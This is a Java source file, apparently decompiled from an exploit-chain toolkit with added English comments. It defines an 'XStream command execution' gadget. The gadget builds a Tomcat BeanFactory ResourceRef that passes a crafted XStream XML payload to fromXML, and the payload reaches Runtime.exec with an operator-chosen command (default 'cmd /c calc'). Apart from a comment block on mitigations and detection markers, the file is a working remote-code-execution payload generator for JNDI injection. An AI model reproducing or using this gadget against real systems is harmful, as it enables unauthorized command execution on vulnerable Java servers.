package com.ar3h.chains.gadget.impl.jndi.factory.beanfactory.expression;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import javax.naming.StringRefAddr;
import org.apache.naming.ResourceRef;

/**
 * Gadget that returns a Tomcat {@link ResourceRef} describing an XStream object to be built by
 * {@code org.apache.naming.factory.BeanFactory}.
 *
 * <p>English gloss of the annotation text below: name = "XStream command execution";
 * description = "factory: org.apache.naming.factory.BeanFactory. A kind of JNDI Ref: BeanFactory
 * is used to call the single-String method com.thoughtworks.xstream.XStream#fromXML, combined
 * with a vulnerability in the xstream dependency to reach RCE". The declared dependencies are
 * "tomcat" and "xstream", i.e. both must be present on the side that resolves the reference.
 *
 * <p>Defensive reading of this class:
 * <ul>
 *   <li>The reference names a factory class with a {@code null} factory location (last
 *       constructor argument), so it relies on classes already on the resolving application's
 *       classpath rather than on remote class loading. Controls that only block remote codebases
 *       would therefore presumably not stop it; the primary control is never passing
 *       attacker-influenced names to a JNDI lookup.</li>
 *   <li>It depends on BeanFactory honouring the {@code forceString} address. NOTE(review): newer
 *       Tomcat releases are understood to have removed {@code forceString}; confirm against the
 *       deployed version.</li>
 *   <li>It depends on XStream deserializing arbitrary types from XML. NOTE(review): XStream's
 *       type-permission allowlist (default in recent releases) is the relevant mitigation;
 *       confirm the deployed version and configuration.</li>
 *   <li>Stable markers for detection are the structural strings visible in this class
 *       ({@code com.thoughtworks.xstream.XStream} as resource class together with
 *       {@code forceString} = {@code a=fromXML}, and XML naming {@code sun.tracing.NullProvider} /
 *       {@code sun.tracing.dtrace.DTraceProbe}); the command text is operator-supplied and should
 *       not be used as a signature.</li>
 * </ul>
 */
@GadgetAnnotation(name = "XStream 命令执行", description = "factory: org.apache.naming.factory.BeanFactory\nJNDI Ref的一种，通过BeanFactory调用单String方法：com.thoughtworks.xstream.XStream#fromXML，配合xstream依赖漏洞进行rce", dependencies = {"tomcat", "xstream"}, priority = 50)
@GadgetTags(tags = {Tag.ResourceRef, Tag.TomcatBeanFactory, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/factory/beanfactory/expression/XStreamRef.class */
public class XStreamRef implements Gadget {

    // Operator-supplied command string (the @Param name translates to "command").
    // It is spliced verbatim into the XML document built in getObject(); no escaping or
    // validation is applied in this class.
    @Param(name = "命令", description = "eg: cmd /c calc")
    public String cmd = "cmd /c calc";

    /**
     * Builds the {@link ResourceRef} returned by this gadget.
     *
     * <p>The reference declares resource class {@code com.thoughtworks.xstream.XStream} and
     * factory {@code org.apache.naming.factory.BeanFactory}, then attaches two string addresses:
     * {@code forceString} = {@code a=fromXML} and {@code a} = the XML document.
     *
     * @return the populated {@code ResourceRef}
     */
    Object getObject() {
        // Arguments as written: resource class, null, "", "", true, factory class name, null.
        ResourceRef resourceRef = new ResourceRef("com.thoughtworks.xstream.XStream", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        // XML for a java.util.PriorityQueue whose element is a dynamic proxy for
        // java.lang.Comparable backed by sun.tracing.NullProvider, with a DTraceProbe entry that
        // names java.lang.Runtime#exec(String); this.cmd is the <string> element.
        // NOTE(review): sun.tracing.* are JDK-internal classes, presumably only available on
        // older JDKs; confirm before relying on that as a mitigating factor.
        String str = "<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>" + this.cmd + "</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>";
        // Per the annotation description, forceString makes BeanFactory treat property "a" as a
        // call to the single-String method fromXML on the created XStream object.
        resourceRef.add(new StringRefAddr("forceString", "a=fromXML"));
        // The value of "a" is the XML document, i.e. the argument handed to fromXML.
        resourceRef.add(new StringRefAddr("a", str));
        return resourceRef;
    }

    /**
     * Gadget entry point; both arguments are unused and the result of {@link #getObject()} is
     * returned unchanged.
     *
     * @param gadgetContext not read by this implementation
     * @param gadgetChain not read by this implementation
     * @return the {@code ResourceRef} built by {@link #getObject()}
     * @throws Exception declared by the interface signature; nothing in this body throws explicitly
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
